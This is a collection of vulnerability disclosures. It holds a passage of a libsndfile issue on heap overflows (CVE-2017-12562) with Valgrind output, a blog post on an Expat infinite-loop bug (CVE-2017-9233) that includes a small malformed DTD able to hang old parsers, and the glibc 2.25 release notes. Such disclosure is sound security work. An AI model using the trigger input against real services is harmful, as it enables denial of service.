    ==15481== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info
    ==15481== Command: ./a.out
    ==15481== 
    0 200 0
    ==15481== Invalid write of size 2
    ==15481==    at 0x4C2F7E3: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==15481==    by 0x4E6DD8F: memcpy (string3.h:51)
    ==15481==    by 0x4E6DD8F: psf_binheader_writef (common.c:687)
    ==15481==    by 0x4E561C0: wavlike_write_strings (wavlike.c:1103)
    ==15481==    by 0x4E57001: wav_write_header (wav.c:1062)
    ==15481==    by 0x4E3F92D: sf_writef_short (sndfile.c:2223)
    ==15481==    by 0x400AFB: test (bug2.c:50)
    ==15481==    by 0x4008B6: main (bug2.c:59)
    ==15481==  Address 0x5778340 is 0 bytes after a block of size 256 alloc'd
    ==15481==    at 0x4C2CC70: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==15481==    by 0x4E6CBF6: psf_allocate (common.c:46)
    ==15481==    by 0x4E41437: sf_open (sndfile.c:330)
    ==15481==    by 0x400AB1: test (bug2.c:40)
    ==15481==    by 0x4008B6: main (bug2.c:59)
    ==15481== 
    ==15481== Invalid write of size 1
    ==15481==    at 0x4E6DDA8: psf_binheader_writef (common.c:689)
    ==15481==    by 0x4E561C0: wavlike_write_strings (wavlike.c:1103)
    ==15481==    by 0x4E57001: wav_write_header (wav.c:1062)
    ==15481==    by 0x4E3F92D: sf_writef_short (sndfile.c:2223)
    ==15481==    by 0x400AFB: test (bug2.c:50)
    ==15481==    by 0x4008B6: main (bug2.c:59)
    ==15481==  Address 0x5778341 is 1 bytes after a block of size 256 alloc'd
    ==15481==    at 0x4C2CC70: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==15481==    by 0x4E6CBF6: psf_allocate (common.c:46)
    ==15481==    by 0x4E41437: sf_open (sndfile.c:330)
    ==15481==    by 0x400AB1: test (bug2.c:40)
    ==15481==    by 0x4008B6: main (bug2.c:59)
    ==15481== 
    ==15481== Syscall param write(buf) points to uninitialised byte(s)
    ==15481==    at 0x5195F80: __write_nocancel (syscall-template.S:81)
    ==15481==    by 0x4E712B9: psf_fwrite (file_io.c:377)
    ==15481==    by 0x4E56C3E: wav_write_header (wav.c:1120)
    ==15481==    by 0x4E3F92D: sf_writef_short (sndfile.c:2223)
    ==15481==    by 0x400AFB: test (bug2.c:50)
    ==15481==    by 0x4008B6: main (bug2.c:59)
    ==15481==  Address 0x57789c0 is 256 bytes inside a block of size 512 alloc'd
    ==15481==    at 0x4C2CE8E: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==15481==    by 0x4E6D923: psf_bump_header_allocation (common.c:68)
    ==15481==    by 0x4E6E63C: psf_binheader_writef (common.c:563)
    ==15481==    by 0x4E56C23: wav_write_header (wav.c:1119)
    ==15481==    by 0x4E3F92D: sf_writef_short (sndfile.c:2223)
    ==15481==    by 0x400AFB: test (bug2.c:50)
    ==15481==    by 0x4008B6: main (bug2.c:59)
    ==15481== 
    ==15481== 
    ==15481== HEAP SUMMARY:
    ==15481==     in use at exit: 0 bytes in 0 blocks
    ==15481==   total heap usage: 8 allocs, 8 frees, 14,491 bytes allocated
    ==15481== 
    ==15481== All heap blocks were freed -- no leaks are possible
    ==15481== 
    ==15481== For counts of detected and suppressed errors, rerun with: -v
    ==15481== Use --track-origins=yes to see where uninitialised values come from
    ==15481== ERROR SUMMARY: 3 errors from 3 contexts (suppressed: 0 from 0)
    manx@idefix ~/test $ 
    

3.  Buffer size requirement calculation in case 'S' does not account for the padding byte (size += (size & 1) ; happens after the calculation which uses size).
    
4.  Case 'S' can overrun the header buffer by 1 byte when no padding is involved (memcpy (&(psf->header.ptr [psf->header.indx]), strptr, size + 1) ; while the buffer is only guaranteed to have size space available).
    
5.  psf->header.ptr [psf->header.indx] = 0 ; in case 'S' always writes 1 byte beyond the space which is guaranteed to be allocated in the header buffer.
    
6.  Case 's' can overrun the provided source string by 1 byte if padding is involved (memcpy (&(psf->header.ptr [psf->header.indx]), strptr, size) ; where size is strlen (strptr) + 1 (which includes the 0 terminator, plus optionally another 1 which is padding and not guaranteed to be readable via the source string pointer).
    

I have not yet invested the time to provide reproducable tests for 3, 4, 5, 6:

*   3 to 5 require hitting the header buffer end exactly which might not even be possible with 2 byte alignment and the buffer enlargment being also 2 byte aligned (I did not investigate this further, triggering might require an odd INITAL_HEADER_SIZE constant and/or a growing factor other than 2). I would consider the current code to at least be fragile nonetheless.
*   6 is difficult to even catch with valgrind or similar tools because the source strings are layed out in one big buffer contiguously (psf->strings.storage) which makes it impossible for memory checkers to detect buffer overruns inside that buffer.

Pull request with fixes will follow.

CVE-2017-12562: Heap buffer overflows in `psf_binheader_writef` in 1.0.28 and later · Issue #292 · libsndfile/libsndfile

XML External Entity vulnerability in libexpat 2.2.0 and earlier (Expat XML Parser Library) allows attackers to put the parser in an infinite loop using a malformed external entity definition from an external DTD.

_Written by Rhodri James_; article also available at kynesim.blogspot.co.uk.

**External Entity Vulnerability in Expat 2.2.0 And Earlier**

I'm in the intriguing position of being employed to work on a free software project by the Linux Foundation. I'm expanding the test coverage of the Expat library under the eagle eye of maintainer Sebastian Pipping, which is an excellent way of discovering how the brilliant, twisted and almost entirely undocumented internals work. (There will be articles. Many articles.)

One thing you expect to come across when writing tests is the occasional bug. I came across a serious one in the parsing of external parameter entities. CVE-2017-9233 (to give it its formal identification) says that bad XML in an external entity will cause the parser to go into an infinite loop and never return control to the application.

For those of you who haven't been saturated in XML terminology for the last however long, an example is in order. Suppose you have the following trivial piece of XML:

<!DOCTYPE doc SYSTEM "http://example.com/level1.dtd">
<doc/>

And the DTD level1.dtd that it reads:

<!ELEMENT doc EMPTY>
<!ENTITY % e SYSTEM "http://example.com/level2.ent">
%e;

And the external entity definition in yet another resource, level2.ent:

<!ELEMENT el EMPTY>
<el/>

Now a quick riffle through the XML standards will tell you that ordinary elements such as <el> aren't allowed in DTDs. All you can legally use are the DTD declarations <!ELEMENT>, <!ATTLIST>, <!ENTITY> and <!NOTATION>. When our entity %e in level.dtd gets substituted in, it will put the <el/> element straight into the DTD, leaving us with a malformed DTD. The parser should detect this and reject the whole shebang.

What actually happened is hard to follow in the source code. (_Many_ articles.) When parsing reached the 'e' of <el/>, the tokenizer recognised it as a valid start of an ordinary element (which is true) and returned the appropriate value, XML_TOK_INSTANCE_START.

The calling code knew how to recognise the limited number of tokens that are legal and most of the tokens that aren't legal in a DTD, but unfortunately it missed this specific case. Without any better instructions from its decision logic, the code assumed that it had found something valid and tried tokenising again, in case there was more text to be parsed.

It did this expecting that its internal pointers were updated to point to that unparsed text. That would have been true if it had dealt with something legal, but since "<e" isn't a legal part of a DTD the pointers had been left alone. The tokenizer therefore saw "<e" again, returned XML_TOK_INSTANCE_START again, and the whole thing repeated until the application was killed.

In brief:

*   The lowest levels of the parser recognise "<e" as starting an element.
*   The next level up correctly doesn't recognise it as a valid case
*   ...but also fails to recognise it as an invalid case.
*   The parser assumes it was successful and tries again _on the same string._

**Why Do I Care?**

"How does this affect me?" you may well ask. "I don't use Expat. I don't even write in C. How can I possibly be affected?" The answer is, you may well be using Expat unknowingly. There are wrapper libraries for Python, Java and many other languages for Expat. Many other application and libraries (particularly C and C++ libraries like Poco, libDOM or libwww) use Expat under the hood.

The libraries often enable external entity parsing, which does potentially allow this bug to bite your application. Some of them will, or used to, download the URIs for you, which is a serious problem. Some of the applications are just parsing local configuration files, but even those might follow a DTD if one was inserted into the configuration file somehow. Other applications explicitly use external DTDs, leaving you vulnerable if those sites are compromised or malicious.

In short, it's entirely possible for you to be using Expat and not know it.

**What Should I Do?**

First and most obviously, upgrade. The current version of libexpat has patched this bug, and a few other things; read the change log for details.

The other thing you should always do is consider how you use your XML parser. I am not a security expert by any stretch of the imagination, but even I know not to download arbitrary URIs, for example. Reading "https://www.w3c.org/xml/fluffy.ent" is probably safe; reading "http://evil.haxx0rs.org/xml/i-pwn-u.dtd" probably isn't. You should check that any library you use doesn't automatically download arbitrary URIs for you, and you should be careful about what URIs you do allow to be downloaded.

**Conclusions**

If you want a moral from this article: always test. Murphy's Law ensures there will always be bugs in your code, and you should make at least some effort to find them before they annoy other people. And if by chance you should be one of those people annoyed by a bug, let the author know. He or she will usually be glad for the feedback and want it fixed as much as you do!

CVE-2017-9233: CVE-2017-9233 · Expat XML parser

CVE-2015-5180 glibc: DNS resolver NULL pointer dereference with crafted record type

This is the mail archive of the libc-alpha@sourceware.org mailing list for the glibc project.

Index Nav:

\[Date Index\] \[Subject Index\] \[Author Index\] \[Thread Index\]

Message Nav:

\[Date Prev\] \[Date Next\]

\[Thread Prev\] \[Thread Next\]

Other format:

\[Raw text\]

*   _From_: Siddhesh Poyarekar <siddhesh at sourceware dot org>
*   _To_: "libc-alpha at sourceware dot org" <libc-alpha at sourceware dot org>
*   _Date_: Sun, 5 Feb 2017 22:08:35 +0530
*   _Subject_: The GNU C Library version 2.25 is now available
*   _Authentication-results_: sourceware.org; auth=none
*   _Reply-to_: siddhesh at sourceware dot org

The GNU C Library
=================

The GNU C Library version 2.25 is now available.

The GNU C Library is used as \*the\* C library in the GNU system and
in GNU/Linux systems, as well as many other systems that use Linux
as the kernel.

The GNU C Library is primarily designed to be a portable
and high performance C library.  It follows all relevant
standards including ISO C11 and POSIX.1-2008.  It is also
internationalized and has one of the most complete
internationalization interfaces known.

The GNU C Library webpage is at http://www.gnu.org/software/libc/

Packages for the 2.25 release may be downloaded from:
        http://ftpmirror.gnu.org/libc/
        http://ftp.gnu.org/gnu/libc/

The mirror list is at http://www.gnu.org/order/ftp.html

NEWS for version 2.25
=====================

\* The feature test macro \_\_STDC\_WANT\_LIB\_EXT2\_\_, from ISO/IEC TR
  24731-2:2010, is supported to enable declarations of functions from
  that TR.  Note that not all functions from that TR are supported by
  the GNU C Library.

\* The feature test macro \_\_STDC\_WANT\_IEC\_60559\_BFP\_EXT\_\_, from ISO/IEC
  TS 18661-1:2014, is supported to enable declarations of functions and
  macros from that TS.  Note that not all features from that TS are
  supported by the GNU C Library.

\* The feature test macro \_\_STDC\_WANT\_IEC\_60559\_FUNCS\_EXT\_\_, from
  ISO/IEC TS 18661-4:2015, is supported to enable declarations of
  functions and macros from that TS.  Note that most features from that
  TS are not supported by the GNU C Library.

\* The nonstandard feature selection macros \_REENTRANT and \_THREAD\_SAFE
  are now treated as compatibility synonyms for \_POSIX\_C\_SOURCE=199506L.
  Since the GNU C Library defaults to a much newer revision of POSIX,
  this will only affect programs that specifically request an old
  conformance mode.  For instance, a program compiled with -std=c89
  -D\_REENTRANT will see a change in the visible declarations, but a
  program compiled with just -D\_REENTRANT, or -std=c99
  -D\_POSIX\_C\_SOURCE=200809L -D\_REENTRANT, will not.

  Some C libraries once required \_REENTRANT and/or \_THREAD\_SAFE to be
  defined by all multithreaded code, but glibc has not required this for
  many years.

\* The inclusion of <sys/sysmacros.h> by <sys/types.h> is deprecated.
  This means that in a future release, the macros “major”, “minor”, and
  “makedev” will only be available from <sys/sysmacros.h>.

  These macros are not part of POSIX nor XSI, and their names frequently
  collide with user code; see for instance glibc bug 19239 and Red Hat
  bug 130601.  <stdlib.h> includes <sys/types.h> under \_GNU\_SOURCE, and
  C++ code presently cannot avoid being compiled under \_GNU\_SOURCE,
  exacerbating the problem.

\* New <fenv.h> features from TS 18661-1:2014 are added to libm: the
  fesetexcept, fetestexceptflag, fegetmode and fesetmode functions, the
  femode\_t type and the FE\_DFL\_MODE and FE\_SNANS\_ALWAYS\_SIGNAL macros.

\* Integer width macros from TS 18661-1:2014 are added to <limits.h>:
  CHAR\_WIDTH, SCHAR\_WIDTH, UCHAR\_WIDTH, SHRT\_WIDTH, USHRT\_WIDTH,
  INT\_WIDTH, UINT\_WIDTH, LONG\_WIDTH, ULONG\_WIDTH, LLONG\_WIDTH,
  ULLONG\_WIDTH; and to <stdint.h>: INT8\_WIDTH, UINT8\_WIDTH,
  INT16\_WIDTH, UINT16\_WIDTH, INT32\_WIDTH, UINT32\_WIDTH, INT64\_WIDTH,
  UINT64\_WIDTH, INT\_LEAST8\_WIDTH, UINT\_LEAST8\_WIDTH, INT\_LEAST16\_WIDTH,
  UINT\_LEAST16\_WIDTH, INT\_LEAST32\_WIDTH, UINT\_LEAST32\_WIDTH,
  INT\_LEAST64\_WIDTH, UINT\_LEAST64\_WIDTH, INT\_FAST8\_WIDTH,
  UINT\_FAST8\_WIDTH, INT\_FAST16\_WIDTH, UINT\_FAST16\_WIDTH,
  INT\_FAST32\_WIDTH, UINT\_FAST32\_WIDTH, INT\_FAST64\_WIDTH,
  UINT\_FAST64\_WIDTH, INTPTR\_WIDTH, UINTPTR\_WIDTH, INTMAX\_WIDTH,
  UINTMAX\_WIDTH, PTRDIFF\_WIDTH, SIG\_ATOMIC\_WIDTH, SIZE\_WIDTH,
  WCHAR\_WIDTH, WINT\_WIDTH.

\* New <math.h> features are added from TS 18661-1:2014:

  - Signaling NaN macros: SNANF, SNAN, SNANL.

  - Nearest integer functions: roundeven, roundevenf, roundevenl,
    fromfp, fromfpf, fromfpl, ufromfp, ufromfpf, ufromfpl, fromfpx,
    fromfpxf, fromfpxl, ufromfpx, ufromfpxf, ufromfpxl.

  - llogb functions: the llogb, llogbf and llogbl functions, and the
    FP\_LLOGB0 and FP\_LLOGBNAN macros.

  - Max-min magnitude functions: fmaxmag, fmaxmagf, fmaxmagl, fminmag,
    fminmagf, fminmagl.

  - Comparison macros: iseqsig.

  - Classification macros: iscanonical, issubnormal, iszero.

  - Total order functions: totalorder, totalorderf, totalorderl,
    totalordermag, totalordermagf, totalordermagl.

  - Canonicalize functions: canonicalize, canonicalizef, canonicalizel.

  - NaN functions: getpayload, getpayloadf, getpayloadl, setpayload,
    setpayloadf, setpayloadl, setpayloadsig, setpayloadsigf,
    setpayloadsigl.

\* The functions strfromd, strfromf, and strfroml, from ISO/IEC TS
  18661-1:2014, are added to libc.  They convert a floating-point
  number into string.

\* Most of glibc can now be built with the stack smashing protector
  enabled.  It is recommended to build glibc with --enable-stack-
  protector=strong.  Implemented by Nick Alcock (Oracle).

\* The function explicit\_bzero, from OpenBSD, has been added to libc.
  It is intended to be used instead of memset() to erase sensitive data
  after use; the compiler will not optimize out calls to explicit\_bzero
  even if they are "unnecessary" (in the sense that no \_correct\_
  program can observe the effects of the memory clear).

\* On ColdFire, MicroBlaze, Nios II and SH3, the float\_t type is now
  defined to float instead of double.  This does not affect the ABI of
  any libraries that are part of the GNU C Library, but may affect the
  ABI of other libraries that use this type in their interfaces.

\* On x86\_64, when compiling with -mfpmath=387 or -mfpmath=sse+387, the
  float\_t and double\_t types are now defined to long double instead of
  float and double.  These options are not the default, and this does
  not affect the ABI of any libraries that are part of the GNU C
  Library, but it may affect the ABI of other libraries that use this
  type in their interfaces, if they are compiled or used with those
  options.

\* The getentropy and getrandom functions, and the <sys/random.h> header
  file have been added.

\* The buffer size for byte-oriented stdio streams is now limited to 8192
  bytes by default.  Previously, on Linux, the default buffer size on
  most
  file systems was 4096 bytes (and thus remains unchanged), except on
  network file systems, where the buffer size was unpredictable and
  could be as large as several megabytes.

\* The <sys/quota.h> header now includes the <linux/quota.h> header.
  Support for the Linux quota interface which predates kernel version
  2.4.22 has been removed.

\* The malloc\_get\_state and malloc\_set\_state functions have been removed.
  Already-existing binaries that dynamically link to these functions
  will get a hidden implementation in which malloc\_get\_state is a
  stub.  As far as we know, these functions are used only by GNU Emacs
  and this change will not adversely affect already-built Emacs
  executables.  Any undumped Emacs executables, which normally exist
  only during an Emacs build, should be rebuilt by re-running
  “./configure; make” in the Emacs build tree.

\* The “ip6-dotint” and “no-ip6-dotint” resolver options, and the
  corresponding RES\_NOIP6DOTINT flag from <resolv.h> have been removed.
  “no-ip6-dotint” had already been the default, and support for the
  “ip6-dotint” option was removed from the Internet in 2006.

\* The "ip6-bytestring" resolver option and the corresponding
  RES\_USEBSTRING flag from <resolv.h> have been removed.  The option
  relied on a backwards-incompatible DNS extension which was never
  deployed on the Internet.

\* The flags RES\_AAONLY, RES\_PRIMARY, RES\_NOCHECKNAME, RES\_KEEPTSIG,
  RES\_BLAST defined in the <resolv.h> header file have been deprecated.
  They were already unimplemented.

\* The "inet6" option in /etc/resolv.conf and the RES\_USE\_INET6 flag for
  \_res.flags are deprecated.  The flag was standardized in RFC 2133, but
  removed again from the IETF name lookup interface specification in RFC
  2553.  Applications should use getaddrinfo instead.

\* DNSSEC-related declarations and definitions have been removed from the
  <arpa/nameser.h> header file, and libresolv will no longer attempt to
  decode the data part of DNSSEC record types.  Previous versions of
  glibc only implemented minimal support for the previous version of
  DNSSEC, which is incompatible with the currently deployed version.

\* The resource record type classification macros ns\_t\_qt\_p, ns\_t\_mrr\_p,
  ns\_t\_rr\_p, ns\_t\_udp\_p, ns\_t\_xfr\_p have been removed from the
  <arpa/nameser.h> header file because the distinction between RR types
  and meta-RR types is not officially standardized, subject to
  revision, and thus not suitable for encoding in a macro.

\* The types res\_sendhookact, res\_send\_qhook, re\_send\_rhook, and the
  qhook and rhook members of the res\_state type in <resolv.h> have been
  removed.  The glibc stub resolver did not support these hooks, but
  the header file did not reflect that.

\* For multi-arch support it is recommended to use a GCC which has
  been built with support for GNU indirect functions.  This ensures
  that correct debugging information is generated for functions
  selected by IFUNC resolvers.  This support can either be enabled by
  configuring GCC with '--enable-gnu-indirect-function', or by
  enabling it by default by setting 'default\_gnu\_indirect\_function'
  variable for a particular architecture in the GCC source file
  'gcc/config.gcc'.

\* GDB pretty printers have been added for mutex and condition variable
  structures in POSIX Threads. When installed and loaded in gdb these
  pretty printers show various pthread variables in human-readable form
  when read using the 'print' or 'display' commands in gdb.

\* Tunables feature added to allow tweaking of the runtime for an
  application program.  This feature can be enabled with the
  '--enable-tunables' configure flag.  The GNU C Library manual has
  details on usage and README.tunables has instructions on adding new
  tunables to the library.

\* A new version of condition variables functions have been implemented
  in the NPTL implementation of POSIX Threads to provide stronger
  ordering guarantees.

\* A new version of pthread\_rwlock functions have been implemented to
  use a more scalable algorithm primarily through not using a critical
  section anymore to make state changes.

Security related changes:

\* On ARM EABI (32-bit), generating a backtrace for execution contexts
  which have been created with makecontext could fail to terminate due
  to a missing .cantunwind annotation.  This has been observed to lead
  to a hang (denial of service) in some Go applications compiled with
  gccgo.  Reported by Andreas Schwab.  (CVE-2016-6323)

\* The DNS stub resolver functions would crash due to a NULL pointer
  dereference when processing a query with a valid DNS question type
  which was used internally in the implementation.  The stub resolver
  now uses a question type which is outside the range of valid question
  type values. (CVE-2015-5180)

Contributors
============

This release was made possible by the contributions of many people.
The maintainers are grateful to everyone who has contributed
changes or bug reports.  These include:

Adhemerval Zanella
Alan Modra
Alexandre Oliva
Andreas Schwab
Andrew Senkevich
Aurelien Jarno
Brent W. Baccala
Carlos O'Donell
Chris Metcalf
Chung-Lin Tang
DJ Delorie
David S. Miller
Denis Kaganovich
Dmitry V. Levin
Ernestas Kulik
Florian Weimer
Gabriel F T Gomes
Gabriel F. T. Gomes
H.J. Lu
Jakub Jelinek
James Clarke
James Greenhalgh
Jim Meyering
John David Anglin
Joseph Myers
Maciej W. Rozycki
Mark Wielaard
Martin Galvan
Martin Pitt
Mike Frysinger
Märt Põder
Nick Alcock
Paul E. Murphy
Paul Murphy
Rajalakshmi Srinivasaraghavan
Rasmus Villemoes
Rical Jasan
Richard Henderson
Roland McGrath
Samuel Thibault
Siddhesh Poyarekar
Stefan Liebler
Steve Ellcey
Svante Signell
Szabolcs Nagy
Tom Tromey
Torvald Riegel
Tulio Magno Quites Machado Filho
Wilco Dijkstra
Yury Norov
Zack Weinberg

Index Nav:

\[Date Index\] \[Subject Index\] \[Author Index\] \[Thread Index\]

Message Nav:

\[Date Prev\] \[Date Next\]

\[Thread Prev\] \[Thread Next\]

Tag

#c++